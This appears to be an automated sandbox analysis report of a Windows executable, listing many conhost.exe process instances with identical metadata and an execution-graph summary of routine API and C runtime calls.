                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:187
                                                                                                    Start time:20:26:56
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:189
                                                                                                    Start time:20:26:56
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:193
                                                                                                    Start time:20:26:58
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:199
                                                                                                    Start time:20:27:00
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:201
                                                                                                    Start time:20:27:00
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:205
                                                                                                    Start time:20:27:01
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:232
                                                                                                    Start time:20:27:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:244
                                                                                                    Start time:20:27:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:247
                                                                                                    Start time:20:27:08
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:255
                                                                                                    Start time:20:27:09
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:259
                                                                                                    Start time:20:27:10
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:261
                                                                                                    Start time:20:27:10
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:273
                                                                                                    Start time:20:27:12
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ae840000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:277
                                                                                                    Start time:20:27:13
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:287
                                                                                                    Start time:20:27:13
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:316
                                                                                                    Start time:20:27:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:322
                                                                                                    Start time:20:27:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:328
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6bac90000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:330
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:334
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:336
                                                                                                    Start time:20:27:17
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:352
                                                                                                    Start time:20:27:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:376
                                                                                                    Start time:20:27:19
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:403
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:417
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:421
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:423
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:427
                                                                                                    Start time:20:27:20
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:435
                                                                                                    Start time:20:27:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:463
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:487
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:489
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:493
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:499
                                                                                                    Start time:20:27:22
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:513
                                                                                                    Start time:20:27:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:519
                                                                                                    Start time:20:27:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:529
                                                                                                    Start time:20:27:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:22.5%
                                                                                                      Total number of Nodes:1000
                                                                                                      Total number of Limit Nodes:22
                                                                                                      execution_graph 23850 7ff6c78698c8 RtlDeleteCriticalSection GetProcAddress TlsSetValue __vcrt_initialize_locks __vcrt_uninitialize_locks 23932 7ff6c786dec8 8 API calls 2 library calls 23934 7ff6c788eecc 46 API calls 23935 7ff6c78586d0 77 API calls 2 library calls 23936 7ff6c785fed0 49 API calls 23938 7ff6c7877ac0 GetCommandLineA GetCommandLineW 23899 7ff6c7874bf0 RtlDeleteCriticalSection GetProcAddress __vcrt_uninitialize_locks 23962 7ff6c78685f0 30 API calls __GSHandlerCheck_EH 23963 7ff6c786b5f0 35 API calls 7 library calls 23853 7ff6c78524f0 10 API calls 2 library calls 23854 7ff6c785f0f0 RtlLeaveCriticalSection 23965 7ff6c786bdda 31 API calls __CxxCallCatchBlock 23727 7ff6c787b0e0 23728 7ff6c787b0f0 23727->23728 23735 7ff6c7884eb4 23728->23735 23730 7ff6c787b0f9 23731 7ff6c787b107 23730->23731 23743 7ff6c787aee4 GetStartupInfoW 23730->23743 23736 7ff6c7884ed3 23735->23736 23741 7ff6c7884efc 23735->23741 23737 7ff6c7874bc4 _set_fmode 6 API calls 23736->23737 23738 7ff6c7884ed8 23737->23738 23754 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23738->23754 23740 7ff6c7884ee4 23740->23730 23741->23740 23755 7ff6c7884dbc 7 API calls 2 library calls 23741->23755 23744 7ff6c787af19 23743->23744 23745 7ff6c787afb3 23743->23745 23744->23745 23746 7ff6c7884eb4 29 API calls 23744->23746 23749 7ff6c787afd4 23745->23749 23747 7ff6c787af42 23746->23747 23747->23745 23748 7ff6c787af6c GetFileType 23747->23748 23748->23747 23753 7ff6c787aff2 23749->23753 23750 7ff6c787b04d GetStdHandle 23752 7ff6c787b060 GetFileType 23750->23752 23750->23753 23751 7ff6c787b0c1 23751->23731 23752->23753 23753->23750 23753->23751 23754->23740 23755->23741 23858 7ff6c78510e0 36 API calls shared_ptr 23940 7ff6c7851ee0 35 API calls 23941 7ff6c785e6e0 48 API calls 23901 7ff6c7885410 30 API calls 3 library calls 23861 7ff6c785f110 RtlEnterCriticalSection 23902 7ff6c7866010 50 API calls 23943 7ff6c788c2fb 11 API calls _log10_special 23903 7ff6c7851000 8 API calls shared_ptr 23904 7ff6c7852400 8 API calls 23863 7ff6c785e500 43 API calls 23944 7ff6c7867b00 29 API calls 2 library calls 23968 7ff6c7866600 44 API calls _RTC_Initialize 23970 7ff6c7851a30 52 API calls 23776 7ff6c7867a30 23777 7ff6c7867a40 23776->23777 23791 7ff6c7877990 23777->23791 23779 7ff6c7867a4c 23797 7ff6c7867d2c 23779->23797 23781 7ff6c7867a64 _RTC_Initialize 23789 7ff6c7867ab9 23781->23789 23802 7ff6c7867edc 23781->23802 23783 7ff6c7867ae5 23785 7ff6c7867a79 23805 7ff6c7877114 23785->23805 23787 7ff6c7867a85 23787->23789 23830 7ff6c78780ac 23787->23830 23790 7ff6c7867ad5 23789->23790 23837 7ff6c7868430 5 API calls 2 library calls 23789->23837 23792 7ff6c78779a1 23791->23792 23793 7ff6c78779a9 23792->23793 23794 7ff6c7874bc4 _set_fmode 6 API calls 23792->23794 23793->23779 23795 7ff6c78779b8 23794->23795 23838 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23795->23838 23798 7ff6c7867d3d 23797->23798 23801 7ff6c7867d42 __scrt_release_startup_lock 23797->23801 23798->23801 23839 7ff6c7868430 5 API calls 2 library calls 23798->23839 23800 7ff6c7867db6 23801->23781 23840 7ff6c7867ea0 23802->23840 23804 7ff6c7867ee5 23804->23785 23806 7ff6c7877134 23805->23806 23807 7ff6c787714b 23805->23807 23808 7ff6c787713c 23806->23808 23809 7ff6c7877152 GetModuleFileNameW 23806->23809 23807->23787 23810 7ff6c7874bc4 _set_fmode 6 API calls 23808->23810 23813 7ff6c787717d 23809->23813 23811 7ff6c7877141 23810->23811 23845 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23811->23845 23846 7ff6c78770b4 6 API calls 2 library calls 23813->23846 23815 7ff6c78771bd 23816 7ff6c78771c5 23815->23816 23820 7ff6c78771dd 23815->23820 23817 7ff6c7874bc4 _set_fmode 6 API calls 23816->23817 23818 7ff6c78771ca 23817->23818 23819 7ff6c787b1d8 __free_lconv_num 6 API calls 23818->23819 23822 7ff6c78771d8 23819->23822 23821 7ff6c78771ff 23820->23821 23824 7ff6c787722b 23820->23824 23825 7ff6c7877244 23820->23825 23823 7ff6c787b1d8 __free_lconv_num 6 API calls 23821->23823 23822->23807 23823->23807 23826 7ff6c787b1d8 __free_lconv_num 6 API calls 23824->23826 23828 7ff6c787b1d8 __free_lconv_num 6 API calls 23825->23828 23827 7ff6c7877234 23826->23827 23829 7ff6c787b1d8 __free_lconv_num 6 API calls 23827->23829 23828->23821 23829->23822 23831 7ff6c787ab80 _Getctype 28 API calls 23830->23831 23832 7ff6c78780b9 23831->23832 23833 7ff6c78780ed 23832->23833 23834 7ff6c7874bc4 _set_fmode 6 API calls 23832->23834 23833->23789 23835 7ff6c78780e2 23834->23835 23847 7ff6c7874a58 28 API calls _invalid_parameter_noinfo 23835->23847 23837->23783 23838->23793 23839->23800 23841 7ff6c7867eba 23840->23841 23843 7ff6c7867eb3 shared_ptr 23840->23843 23844 7ff6c78797ec 8 API calls shared_ptr 23841->23844 23843->23804 23844->23843 23845->23807 23846->23815 23847->23833 23906 7ff6c7861430 30 API calls 23908 7ff6c788c020 CloseHandle 22896 7ff6c7867b1c 22920 7ff6c7867cf0 22896->22920 22899 7ff6c7867b3d __scrt_acquire_startup_lock 22902 7ff6c7867c7d 22899->22902 22903 7ff6c7867b5b _RTC_Initialize __scrt_release_startup_lock 22899->22903 22900 7ff6c7867c73 23074 7ff6c7868430 5 API calls 2 library calls 22900->23074 23075 7ff6c7868430 5 API calls 2 library calls 22902->23075 22906 7ff6c7867b80 22903->22906 22909 7ff6c7867c06 22903->22909 23071 7ff6c786d440 28 API calls __GSHandlerCheck_EH 22903->23071 22905 7ff6c7867c88 BuildCatchObjectHelperInternal 23076 7ff6c7868324 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22905->23076 22908 7ff6c7867ca9 22926 7ff6c787787c 22909->22926 22912 7ff6c7867c0b 22932 7ff6c7852840 22912->22932 22916 7ff6c7867c2f 22916->22905 22917 7ff6c7867c33 22916->22917 23073 7ff6c7867e74 RtlDeleteCriticalSection 22917->23073 22919 7ff6c7867c46 22919->22906 22921 7ff6c7867cf8 22920->22921 22922 7ff6c7867d04 __scrt_dllmain_crt_thread_attach 22921->22922 22923 7ff6c7867b35 22922->22923 22924 7ff6c7867d11 22922->22924 22923->22899 22923->22900 22924->22923 23077 7ff6c78698f0 RtlDeleteCriticalSection __vcrt_uninitialize_ptd __vcrt_uninitialize_locks 22924->23077 22927 7ff6c787788c 22926->22927 22931 7ff6c78778a1 22926->22931 22927->22931 23078 7ff6c787730c 22927->23078 22931->22912 22933 7ff6c78528c8 22932->22933 23101 7ff6c785fe90 22933->23101 22935 7ff6c78528d7 23105 7ff6c7873510 22935->23105 22937 7ff6c78528ec 22938 7ff6c785fe90 52 API calls 22937->22938 22939 7ff6c785293a 22938->22939 23138 7ff6c785fcd0 22939->23138 22941 7ff6c7852d5d 22942 7ff6c7852d6a GetFileAttributesW 22941->22942 22944 7ff6c7852d7d 22942->22944 22943 7ff6c7852ee5 22946 7ff6c785fcd0 30 API calls 22943->22946 22944->22943 23152 7ff6c785f530 22944->23152 22948 7ff6c7852f7d 22946->22948 22947 7ff6c7852ec0 23194 7ff6c785f410 22947->23194 22952 7ff6c785fcd0 30 API calls 22948->22952 22953 7ff6c785303a 22952->22953 22954 7ff6c785fcd0 30 API calls 22953->22954 22955 7ff6c7853737 22954->22955 22956 7ff6c785fcd0 30 API calls 22955->22956 22957 7ff6c7853b2e 22956->22957 22958 7ff6c785fcd0 30 API calls 22957->22958 22959 7ff6c7853fb3 22958->22959 22962 7ff6c785fcd0 30 API calls 22959->22962 22960 7ff6c7852db1 22960->22947 23180 7ff6c78620a0 22960->23180 22964 7ff6c78544de 22962->22964 22966 7ff6c785fcd0 30 API calls 22964->22966 22965 7ff6c78620a0 57 API calls 22965->22947 